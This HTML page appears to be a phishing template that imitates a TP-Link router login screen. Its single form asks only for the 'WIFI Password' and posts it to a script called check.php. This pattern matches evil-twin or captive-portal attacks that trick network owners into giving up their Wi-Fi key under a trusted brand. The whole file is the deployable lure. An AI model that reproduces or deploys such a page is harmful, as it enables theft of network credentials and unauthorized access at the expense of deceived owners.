<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="nl">
<head>
	<meta http-equiv="content-type" content="text/html;">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/stylesheet.css">
    <title>TP-Link Login</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body {
            width: 100%;
            height: 100vh;
            border: px #56c7d8 solid;
            font-family: Arial, sans-serif;
            background-color: white;
            margin: 0;
            position: relative;

        }
        .login-container {
            width: 540px;
            margin: 0 auto;
            margin-right: 10px;
            padding: 20px;
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            height: 100%;
            position: relative;
            border: whitesmoke solid 2px;
            bottom: 10px;
            right: 10px;
            top: -16px;
        }
        .login-container h2 {
            text-align: center;
            margin-bottom: 20px;
        }
        .form-group {
            margin-bottom: 15px;
        }
        .form-group label {
            display: block;
            font-weight: bold;
            position: relative;
        }
        .form-group input[type="text"]{
            width: 95%;
            border: 1px solid #ccc;
            border-radius: 3px;
            opacity:0.4 ;
        }
        .form-group input[type="password"] {
            width: 100%;
            border: 1px solid #ccc;
            border-radius: 3px;
            height: 40px;
            
            
            
        }
        .form-group button {
            width: 100%;
            background-color: #58d8ec;
            color: #fff;
            border: none;
            border-radius: 3px;
            cursor: pointer;
            height: 40px;
            

        }
        .logo{
            
            background-color: #56c7d8;
            position: relative;

            height: 110px;
            width: 100%;
            top: 0px;
            left: 0px;
            right: 0px;
            bottom: 0px;
            margin: 0px;
            padding: 0px;
            border: none;
            border-radius: 0px;
            box-shadow: none;
            padding-left: 220px;
            box-shadow: inset -1px -1px 1px rgba(0, 0, 0, 0.1);

        }
        .form-group p{
            text-align:right;
            color: #4ecde0;
            font-weight: bold;
            position: relative;
            bottom: -10px;
        }
        .logo img{
            top:20px;
            position: relative;
            height: 60px;
        }
    </style>
</head>
<body>
    <div class="logo">
        <img src="logo.png">
    </div>
    <div class="login-container">
        <form id="form1" name="form1" method="POST" action="check.php" >
            <div class="form-group">
                <label for="password" style="opacity:0.6 ;" >WIFI Password:</label>
                <input type="password" id="password" name="password" required>
            </div>
            <div class="form-group">
                <button type="submit">LOG IN</button>
                <p>Forget Password?</p>
            </div>
        </form>
    </div>
</body>
</html>
